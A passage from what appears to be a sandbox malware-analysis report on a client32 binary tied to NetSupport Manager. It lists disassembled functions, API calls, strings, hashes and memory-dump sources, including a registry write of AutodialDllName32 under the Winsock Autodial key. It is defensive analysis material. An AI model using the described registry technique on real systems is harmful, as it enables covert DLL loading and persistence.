                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileHeapInfoVersion$AllocateErrorFreeLastQuerySizeValue_free_malloc_memset
                                                        • String ID: shdocvw.dll
                                                        • API String ID: 2585106851-1755026807
                                                        • Opcode ID: a5a6dc1371e67929e549317819ac0ef8421456fe4466c86a96cd17ec10c32abf
                                                        • Instruction ID: 5eb31461ea1f50519f917a15bbfe73ab79f775fccf8d8aeefc1cc7a1de130f4a
                                                        • Opcode Fuzzy Hash: a5a6dc1371e67929e549317819ac0ef8421456fe4466c86a96cd17ec10c32abf
                                                        • Instruction Fuzzy Hash: E711937690412DABCB64CB54CC81EDEF378BF89708F1042EAE95957240EA706B84CF91
                                                        Function 1103D550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 1103D566
                                                        • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D57C
                                                        • IsWindow.USER32(00000000), ref: 1103D584
                                                        • Sleep.KERNEL32(00000014), ref: 1103D597
                                                        • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D5A7
                                                        • IsWindow.USER32(00000000), ref: 1103D5AF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Find$Sleep
                                                        • String ID: PCIVideoSlave32
                                                        • API String ID: 2137649973-2496367574
                                                        • Opcode ID: 1703b4c4a5965f14d39e20ba58b4c881867a64bd66d0339c621bbb7f38325315
                                                        • Instruction ID: 689c245a1c5877e120963c17b046aa8ad15570e82cb5b2dcf4060744f6f7f189
                                                        • Opcode Fuzzy Hash: 1703b4c4a5965f14d39e20ba58b4c881867a64bd66d0339c621bbb7f38325315
                                                        • Instruction Fuzzy Hash: C4F0A4B39012296FDB01DFB9CCC8F8EB7E9AB44AA9F414175F918E7188E230E4014B71
                                                        Function 11003360 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EFF), ref: 1100336E
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 1100339A
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110033BC
                                                        • DestroyMenu.USER32(00000000), ref: 110033CA
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 468487828-934300333
                                                        • Opcode ID: 370a918c1ffef44c6d2a1e7988c1972a9a3e997084686a8955a4fd91555efcf8
                                                        • Instruction ID: d55ef711f20a90ce7b89774d5e68305bce48b38f183b762cf5caec9f28e3c4fe
                                                        • Opcode Fuzzy Hash: 370a918c1ffef44c6d2a1e7988c1972a9a3e997084686a8955a4fd91555efcf8
                                                        • Instruction Fuzzy Hash: C9F0E97BE4066277D51351A59C85F9FF7D8DB966EEF048031F604F6280EB50A80041F5
                                                        Function 11003270 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EF9), ref: 1100327D
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 110032A3
                                                        • GetMenuItemCount.USER32(00000000), ref: 110032C7
                                                        • DestroyMenu.USER32(00000000), ref: 110032D9
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 4241058051-934300333
                                                        • Opcode ID: 9d6183a6848e5764ebbed8253b940d7be87a8ceda2fe17ff10de54b997e3a651
                                                        • Instruction ID: 1ec89cdccd47366b5ee8b19df69f8a376e0222ab7e63b8b8b85f6a37c90a799a
                                                        • Opcode Fuzzy Hash: 9d6183a6848e5764ebbed8253b940d7be87a8ceda2fe17ff10de54b997e3a651
                                                        • Instruction Fuzzy Hash: 80F0E93AE445627BD5135265AC09FCFF6D4DB966AEF048030F400E5245EA10640085F1
                                                        Function 1104B627 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 167windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 1104B83D
                                                        • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1104B84E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostWindow
                                                        • String ID: 10.21.0.0$Client$Disconnect(%p), closing player$ReconnectDelay
                                                        • API String ID: 3618638489-3222940297
                                                        • Opcode ID: de6374e47233d955090eb4c934b1f2018db41b985611608a11f03de94963f4d7
                                                        • Instruction ID: fdd7292e2912fe1eae46148bd9e15f8ec271a2e4496cdee647683204071506ce
                                                        • Opcode Fuzzy Hash: de6374e47233d955090eb4c934b1f2018db41b985611608a11f03de94963f4d7
                                                        • Instruction Fuzzy Hash: 21516F79A05A029FDBD4DFA1CCC8FAAB364AF4530CF1845B8ED194F286DA75A800C761
                                                        Function 110B3130 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateMenu.USER32 ref: 110B3223
                                                        • AppendMenuA.USER32(?,00000010,00000000,?), ref: 110B3236
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$AppendCreateErrorExitLastMessageProcess_freewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\IEFavourites.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 1956547959-127113396
                                                        • Opcode ID: ae0daca5e524887d6045aa3093877d1e47d145438e00f3db79d2cd643436765f
                                                        • Instruction ID: 1b6c63c24338c86407ebd4c0ec086c5d3198c705a6e80d99f4d3243e9f46137b
                                                        • Opcode Fuzzy Hash: ae0daca5e524887d6045aa3093877d1e47d145438e00f3db79d2cd643436765f
                                                        • Instruction Fuzzy Hash: 33518C7DA08606ABCB25CF55DC80F9EF3B4FF48718F208658ED2567780DB31A905CAA1
                                                        Function 1105F0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVersionExA.KERNEL32(?), ref: 1105F10E
                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Services\Winsock\Autodial,00000000,00000000,00000000), ref: 1105F136
                                                        • RegSetValueExA.ADVAPI32(00000000,AutodialDllName32,00000000,?,111D92E1,00000010), ref: 1105F220
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1105F22D
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Value$CloseOpenQueryVersion
                                                        • String ID: AutodialDllName32$System\CurrentControlSet\Services\Winsock\Autodial
                                                        • API String ID: 387276457-2283657482
                                                        • Opcode ID: a3b138f78b095ecd2dd4f2ceb670666107fbd6ca84dad05e8fdd868d7ed900a2
                                                        • Instruction ID: e4c3f3aff344711777e9417e9598a4d17be5596ef11d057f72070e3f7c066d2f
                                                        • Opcode Fuzzy Hash: a3b138f78b095ecd2dd4f2ceb670666107fbd6ca84dad05e8fdd868d7ed900a2
                                                        • Instruction Fuzzy Hash: C131A379E0021D9FDF60CF54CC88FADF7BAAB45308F4080D9E848A2141E7746A45CF52
                                                        Function 11055010 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,82E0FB89,76872AF0,00000001,000000C8,110554E5,?,?,00000000,?,?), ref: 11055068
                                                        • timeGetTime.WINMM ref: 1105509B
                                                          • Part of subcall function 11131740: _strncpy.LIBCMT ref: 11131782
                                                        • SetEvent.KERNEL32(?), ref: 110550E4
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110550EB
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSectionwsprintf$EnterErrorEventExitLastLeaveMessageProcessTime_malloc_memset_strncpytime
                                                        • String ID: CltReconn.cpp$gMain.pReconnThread
                                                        • API String ID: 3397837340-2390197369
                                                        • Opcode ID: b682c9cf606a3662c13bb09a8953d970b76c9c428edd8b2ecbfa41850f18c41f
                                                        • Instruction ID: 951eb923e7c686365c6e5888714639626bc13f8e8268a3ec29750d4fc865e335
                                                        • Opcode Fuzzy Hash: b682c9cf606a3662c13bb09a8953d970b76c9c428edd8b2ecbfa41850f18c41f
                                                        • Instruction Fuzzy Hash: 2A317FB6D006159FCB51CFA8D880B9EFBF8FB48718F10856AE916E7244D775A900CBE1
                                                        Function 110AF0C0 Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemMetrics.USER32(0000004C), ref: 110AF0F2
                                                        • GetSystemMetrics.USER32(0000004D), ref: 110AF0F9
                                                        • GetSystemMetrics.USER32(0000004E), ref: 110AF100
                                                        • GetSystemMetrics.USER32(0000004F), ref: 110AF107
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110AF116
                                                        • GetSystemMetrics.USER32(?), ref: 110AF124
                                                        • GetSystemMetrics.USER32(00000001), ref: 110AF133
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: System$Metrics$InfoParameters
                                                        • String ID:
                                                        • API String ID: 3136151823-0
                                                        • Opcode ID: bf5e026fc6f2f8d516ea3f6301bb30ff143f875d1c1b2847ac3ef235195643f8
                                                        • Instruction ID: 7c71a874cc683e3bf2dee40a1eb1ca687fcdd4ea94523516a10deac17ed6ea0e
                                                        • Opcode Fuzzy Hash: bf5e026fc6f2f8d516ea3f6301bb30ff143f875d1c1b2847ac3ef235195643f8
                                                        • Instruction Fuzzy Hash: 41310771E0030A9FCB14DFE9C881AAEFBF5AF88700F20842EE519A7380D674A841CF54
                                                        Function 110095A0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110C63A0: wvsprintfA.USER32(?,?,00000000), ref: 110C63D2
                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009656
                                                        • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100966B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • IsA(), xrefs: 1100960D, 11009635
                                                        • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 110095D9
                                                        • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009665
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009608, 11009630
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                        • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 863766397-2085542942
                                                        • Opcode ID: d60069f5e1de0f43d3ee76dcbf86c54028c08c36dc082fe327747f164939fbe6
                                                        • Instruction ID: 691b7d999311c479868ee19ae1316f275a6346ce6453caec75fd1e84fec43159
                                                        • Opcode Fuzzy Hash: d60069f5e1de0f43d3ee76dcbf86c54028c08c36dc082fe327747f164939fbe6
                                                        • Instruction Fuzzy Hash: EB214C79A0061AABDB11DF95CC41FDEF3B8FF59614F104259E921B3280EB747904CEA0
                                                        Function 110055D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(00000000,?), ref: 1100560D
                                                        • BeginPaint.USER32(?,?), ref: 11005618
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100563A
                                                        • EndPaint.USER32(?,?), ref: 1100565F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110055F3
                                                        • m_hWnd, xrefs: 110055F8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
